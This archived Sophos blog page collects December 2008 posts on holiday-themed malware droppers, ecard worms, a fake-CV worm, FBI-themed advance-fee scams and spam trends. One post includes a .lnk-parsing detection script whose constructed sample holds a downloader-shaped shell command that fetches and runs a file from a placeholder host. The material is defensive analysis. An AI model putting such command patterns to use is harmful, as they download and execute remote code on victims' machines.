Sophos

Archive for December, 2008

Monkeying around with postcards and ecards

The predictability of the social engineering used by malware authors is one of the few things that we can be certain about at Christmas (see Samir’s post here). True to form, over the past days and weeks a variety of malware spammed out using Christmas or New Year themed social engineering has been floating around. This post serves as a warning to those who are not already aware of the risks of blindly running attachments or clicking links in such email.

Aside from the usual postcard and e-card malware, this year we have a Flash driven Happy Christmas greetings cartoon known as ‘Christmas Monkeys’. The malware authors have taken innocent Flash content (available online), and combined it with a backdoor Trojan in a dropper using the filename Christmas Monkeys.exe. The dropper then appears to have been spammed out to victims.

When run, however, you get more than a couple of harmless cartoon monkeys for your trouble. The backdoor Trojan is extracted to the temp folder (as b.exe) and silently executed. The harmless Flash cartoon runs via a Macromedia Flash Player binary, extracted as a.exe to the same folder.

Of course, the victim is so wrapped up in the monkeys that they are unlikely to notice any suspicious activity on the machine.

That is, unless they have Sophos installed, in which case, they would have been alerted to the writing of the backdoor Trojan (b.exe) to the temp folder.

Thanks to the proactive detection of the backdoor component (Mal/Rootkit-A), the malware will never get installed. Detection for the top level dropper has also been added (as Troj/Agent-IMV).

Users should not just be suspicious of email attachments. Another family we have seen active over the past few days is W32/Waled, a worm that sends emails containing a link to a spoof greeting card site.

Clicking on the link takes the victim to the malicious drop site (a variety of domains are being used).

Clicking on the image will result in getting prompted to download and run a copy of the worm (as postcard.exe). This is detected as W32/Waled-D. Additionally, a malicious script on the page attempts to load malicious content from another remote site in order to exploit a whole variety of browser vulnerabilities. Effective insurance against common sense switching back on, and not clicking on the image.

In summary, the same old predictable tricks. After a couple of days there should be a respite, before it all begins again in a few weeks in time for Valentine’s day.


Play phishing

Over Christmas I spent some time in the metropolis that is Heathrow’s Terminal 1. To pass the time I bought a couple of non-computing magazines (holidays are a chance to forget about work!). Imagine my surprise then when upon opening Scientific American, I found an article on Phishing.

The article titled, in the print copy, Can Phishing Be Foiled? was an insight into the work being done by Carnegie Mellon University’s research group, the Usable Privacy and Security Laboratory. The thing that caught my eye about the research was a project named Anti-Phishing Phil, which is a game that attempts to show people how to spot a Phish.

Luckily, that was the only computing related article :) Though I was struck by the similarity between research on Phishing (how computer scientists are looking at the ways phishers fool people) and the article ‘Magic and the Brain’ (how neuroscientists are looking at the ways that magicians fool people).

Strangely, in the other magazine I bought, there was also an article on Magic. A coincidence?


Crackdown on online service exploitation

Whilst reading the paper yesterday morning an interesting article caught my eye. It suggested that the UK Government is considering imposing some form of ratings system on web sites in order to thwart offensive and malicious activity. From the interview published in the Daily Telegraph (online here), it is clear that the Culture Secretary, Andy Burnham, is concerned about the dangers children may face when browsing the web.

The thoughts expressed in the interview have angered many. The bulk of the comments that have been posted in response to the article are of a negative nature, seeing the move as an attack against free speech. This is to be expected - any attempt by Governments to monitor content or enforce regulations will immediately cause censorship arguments to flare up. But if we try to step aside from these issues for a moment, and think specifically about the current state of affairs with cybercrime, I do think there is some underlying value in trying to address some of the obvious problems that exist today. In this blog post I will consider just one of these problems - the abuse of online services we all use and trust.

The bulk of internet users are largely ignorant. Ignorant of the technology they are using, and ignorant of the threats that are out there. This is not meant as criticism - one of the great things about technology is that it empowers people to do things very easily. But this ignorance makes it easy for the bad guys to scam people, from stealing their credentials in phishing attacks to infecting their machine with malware.

Of course, the article is more concerned with preventing access to inappropriate content, not protecting users from malware. But the mention of defining “take down times” is something that is relevant to both. The sites that are so popular with users are the same sites that are being exploited by malware authors and scammers.

Back in January, I blogged about the abuse of social bookmarking services such as Digg [2]. Well, the practice has continued apace throughout the year. For example, poking through some of the links submitted (’Digged’) this morning, a batch of ones intended to infect victims with fake alert malware is quickly apparent. The lure in each is simple, just as with the social engineering in email-borne malware, as shown in the example below:

Anyone clicking on the link will go to a blog page providing a link to the movie content. After another redirection they end up at one of the familiar porntube sites we have talked about before (see for example here).

This simple case is a perfect example of one of the problems we have currently - the ease with which trusted services can be exploited. In the example, Digg and Blogspot have been abused, but they are not to be singled out. In reality a whole host of other similar services are being exploited in the same way.

The issue of take down (where upon notification, such services remove content rapidly) has become very important. But this is still reactive - users will still have been exposed to the threat. Should we not investigate methods of preventing the malicious content being uploaded in the first place? In many cases, the individuals posting the content are “new” to that service - of unknown reputation if you like. Our friend yetfaer who made the Digg posting above would certainly trigger even the most basic heuristics:

Similarly, the profiles of the posters of scores of pornographic content uploaded to popular video-sharing sites are suggestive of poor reputation. It should be trivial to reject (or classify appropriately) certain postings immediately, rather than relying on user complaints/reports before the appropriate classification is made and exposing users to malicious or inappropriate content in the meantime.

Rather than blanket enforcement of age categories, I would like to see more pressure on the providers of popular online services (video, blog, image and file sharing sites etc) to come up with more innovative ways of proactively blocking malicious or inappropriate content.


A Long Shortcut

Driving to family for Christmas, some of you may have tried taking a shortcut to avoid traffic queues. Sometimes those “shortcuts” can end up longer than the original route, but hopefully they did not get you into as much trouble as some of the shortcuts we have been seeing in spam recently.

I am talking about Windows “.lnk” shortcut files. Question: Can a shortcut cause a legitimate application on your computer to do malicious things?

Answer: Yes, easily. Take a look at the following, which arrived via one of our spam traps this morning:

 Shortcut Properties Page

“Target” shows just the start of a command with a long sequence of parameters - effectively a script. You can see enough to get the idea: using the command shell it will echo a series of commands to be executed, the first one of which opens a connection to a remote website. You can probably guess what the next command is: “get” - to download a file, which will then be executed. In short, this .lnk file is a downloader Trojan.

Over the past few weeks we have seen an increasing number of such shortcut links sent out in spam. This morning’s was detected as Troj/DownLnk-A. Previous examples include Troj/Dloadr-BVT. Since today was a fairly quiet day I have had time to prepare some generic detection for this technique. Over the next few days we will be scanning the web looking for where the technique is used, whether it has any legitimate uses, and if so how to differentiate legitimate samples from malware.
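As an added illustration of the kind of generic check described above (example code written for this post, not SophosLabs detection logic and not the spammed file itself), here is a small parser for the Shell Link StringData fields, which is where a .lnk keeps its relative Target path and the argument string shown in the Properties page, followed by a heuristic that flags a shortcut whose Target is the command shell driven by an echoed, scripted argument list. The two .lnk samples are constructed inside the block with [host] and [file] as placeholders, and decoding non-Unicode links as cp1252 is an assumption.

```python
import struct
# Shell Link (.lnk) constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
(HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH,
 HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]

def parse_lnk(data):
    """Return the StringData fields of a .lnk (the Target path and its arguments)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_ID_LIST:        # skip LinkTargetIDList (2-byte size + items)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:      # skip LinkInfo (its size field includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + width * count]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")  # cp1252 assumed for ANSI links
        off += width * count
    return fields

def assess_lnk(fields):
    """Score a shortcut that drives the command shell from a scripted argument string."""
    target = fields.get("relative_path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    args = fields.get("arguments", "").lower()
    reasons = []
    if target in ("cmd.exe", "command.com") and "echo" in args:
        reasons.append("shell target echoing commands from its own argument string")
    if "ftp" in args and "-s:" in args:
        reasons.append("ftp driven by a script file (the download step)")
    if args.count("&") >= 3:
        reasons.append("long chain of '&'-joined commands")
    return len(reasons), reasons

def build_lnk(rel_path, args):  # minimal Unicode .lnk: RelativePath + Arguments only (test input)
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_REL_PATH | HAS_ARGS | IS_UNICODE)
    header += b"\x00" * (0x4C - len(header))
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(rel_path) + sd(args)

# Constructed samples, not the spammed file: a benign shortcut and a downloader-shaped one.
BENIGN = build_lnk("..\\..\\Windows\\notepad.exe", "readme.txt")
DOWNLOADER = build_lnk("..\\..\\Windows\\System32\\cmd.exe",
                       "/c echo open [host]>s&echo get [file]>>s&ftp -s:s&[file]")
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block, which the parser skips by their size fields, so the same function works on files pulled from a spam trap.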

Meanwhile, stay safe online. Do not click on links from sources you do not trust or that seem out of context. Do not assume any kind of file attachment is safe - the bad guys are always making use of new tricks and exploits.

I also hope those of you still travelling have safe journeys over this festive season.

Robert


Dorf to SQL in a year

Reviewing Chee and Samir’s posts for Dec 26 2007 reminded me how much the Dorf family of malware dominated thinking in 2007. I don’t know the actual figure but I suspect a significant number of blog posts and identities written in 2007 were related to the Dorf campaign.

If I were to review the posts for 2008, particularly the last few months, then they would be completely dominated by SQL Injection attacks. Despite the patches being available we continue to see websites compromised through their backend databases. This continues to be a particularly worrying trend as many shopping sites rely on this technology to provide us with the goods we want and according to the news today on the BBC, we are even buying online now on Christmas Day. That could make a particularly unwelcome Christmas Present for someone over the holiday season.

As for today, the malware queue has seen a typical Fake AV Trojan plus some Agent Trojans. In the meantime the spam queues have seen the usual dominance of pills along with several gambling campaigns. It’s been another normal day here at SophosLabs.


Nigerian 419/advance fee scams: the FBI edition

On this relatively quiet Christmas day, I got a chance to examine some of the messages that came to our spamtraps. I was searching for Christmas/new year related Nigerian scams, and I came across something else quite strange, which is Federal Bureau of Investigation (FBI)-themed Nigerian scams.

The FBI would never give out ATM cards full of cash, or if they did, they would probably not give out the money from a Nigerian bank. I wonder if the scammers had thought this all through before sending out these scams. I managed to find three different messages that we have received in the past few days.

First up is a nicely put together message that even has an FBI banner at the top and an NSB seal at the bottom:

FBI Nigerian scam 1a

I am quite sure that the “Intelligence Monitoring System”, if it exists, does not help verify whether people have won a sum of money. Of all the FBI-themed scams I’m showing today, the scammers in this one are by far the greediest. They are asking for an advance fee of $850 - quite a hefty sum. Of course, if a person has parted with his/her money to these scammers, they’ll never see it again. Definitely not “Safe and 100% risk free”.

The second message is a promise of an “ATM card with lots of money”:

This second message also mentions the “Intelligence Monitoring System” but the message body is different. It seems that the scammers could not make up their mind on the content of the message and ended up contradicting themselves. In the first paragraph, the message first claims that the recipient is getting defrauded by imposters. Later on in the paragraph, it says that the payment has not been received because “you have not fulfilled your Financial oblication give to you in respect of your Contract/Inheritance Payment”. So which scenario is it? A fraudster or a missing fee? Even though the “total payment” of the scam is also US $800,000, the advance fee asked for in this message is only $150. Perhaps a nicer looking scam message has a bigger price tag?

The third FBI-themed Nigerian scam is just as convoluted as the other two:


In this third scam, the payment value has been raised to $10,700,000, more than a tenfold increase compared to the other two messages. This time they did not list the value of the advance fee. Once again, the scammers claim that the payment is “100% genuine and hitch free”. The strangest part of this scam message is the title of the supposed report, which is “FEDERAL BUREAU OF INVESTIGATION SEEKING TO WIRETAP THE INTERNET”. I have no idea what that has to do with the rest of the message.

After reading through the three messages, it strikes me that they may all originate from the same source. Whether the messages themselves seem convincing or not, I hope no one fell for these scams, especially during the holidays. Hopefully, with more awareness of these scams, they will disappear and become a thing of the past. At least one could wish for that in the new year.


McColo and me

Today I am at work with Mathieu and we are processing any spam that the automated systems don’t already block and analysing any malware that we don’t already proactively detect - actually Mathieu is doing the hard work whilst I do the easy work. I am pleased to be able to report that it is relatively quiet.

Whilst it is quiet I have had a look at my personal catch rate. I have blogged about this before here and I thought I should check out how it has fared since McColo was taken down. Several of the SophosLabs guys reported on this back in November - here, here and here.

Here is the graph of my catch rate since 1 Oct 2008.

From my previous post you can see that spam goes in cycles over time and it was already starting to decline from an average of 170 messages a day but once McColo was shut down it averaged 70 per day. Since then, despite the Rustock botnet being revived, my personal catch rate has not changed significantly.

One last point: I was wondering whether spam declined or increased close to Christmas. I’ll leave you to interpret the graph as you see fit, but I reckon there was an increase in early December and it has probably now fallen back to its late November level. In the meantime there is still plenty of spam and malware being written, and Sean reported earlier today on what he was seeing. From my perspective, watching the spam systems, I am left wondering just how much viagra one person can handle…

Have a great, and safe, Christmas.


Plenty of Bargains for Christmas Day Shoppers

Forget the financial crisis folks, there are still plenty of too-good-to-be-true deals available for those looking for a last minute Christmas day bargain gift. Check out the following great email deals:

For those that need help in the sack, and are willing to take medications with no idea how or where they were made, try this guy


For those looking to have their bank account details stolen, click on the link

For those looking to have their ID stolen, get your ID card ready

Folks, not everyone around the world is at home enjoying a day off with family and friends so there is no reason why spammers would pass on the opportunity to make a quick buck, and they don’t.

For all those working today where they might have otherwise been enjoying festivities, or working just to get out of going to Aunt Mavis’s boring Christmas lunch, have a merry day!


Good CV, Bad CV

If you are an employer, you may receive lots of CVs from candidates. Generally one would just open them up and review the content. Now you had better be careful the next time you receive one, because you just might have the “other” kind of CV, such as the one I received today.

It came with the Microsoft Word icon, and looked just like any other Word document I have seen over the years. Turned out it wasn’t, and, believe it or not, was an executable worm instead ;-).

The most important thing about this worm is that it pretends to be a Microsoft Word document, but it is an executable file that hides its true file extension. Attractive, isn’t it?

In addition, when you open the CV, there is nothing displayed on your screen. Yes, nothing. Are you disappointed? You will be, because this particular CV has a nasty payload.

Without notice, the bad “CV” creates multiple copies of itself in the following paths on the local computer:

<SendTo>/<filename>.exe

<Start Menu>/Microsoft Office Word 2003.exe

<Start Menu>/<filename>.exe

<windows>/<filename>.exe

C:/<filename>.exe

Got a headache now? Then it might be time you hired an IT student (or got Sophos, as we detect this as W32/VB-DXC).

While all this doesn’t surprise me, as masquerading as a legitimate file is an *old* way to get people to click-and-run malware, it does raise an interesting point. Do malware writers expect to get legitimate jobs by providing malware as proof of expertise? I can tell you the answer will be no.

A good CV is compulsory; a good CV is not a worm!

P.S -> I hope folks are enjoying their festive lunches today. Merry Christmas everyone!


Winter wonderland at the CA Lab

This definitely isn’t my typical malware related blog post. Canada is experiencing some of the worst winter weather in a long time. The reason I elected to settle in Vancouver in the first place was primarily because it snowed 3 to 4 days a year and remained at temperatures ranging from 5C to -5C (41F to 23F) throughout the winter months while the rest of Canada suffers temperatures well below -20C (-4F).

Though it’s not very cold in Vancouver right now, we’re getting more snow than normal. We’ve had 30cm fall in the last three days with another 15-20cm of snow expected today and tomorrow. The reason this is extraordinary is that this is the first white Christmas Vancouver is going to have since ‘98, which is exciting. I thought I’d share a few pictures snapped with my phone:

Sophos building from across the street

Snow on our rooftop

Snow on the pavement beside the office

I’m glad to report everyone working today managed to get to the office safe and sound with loads of joyous snow stories to share :)

Have a merry Christmas everyone!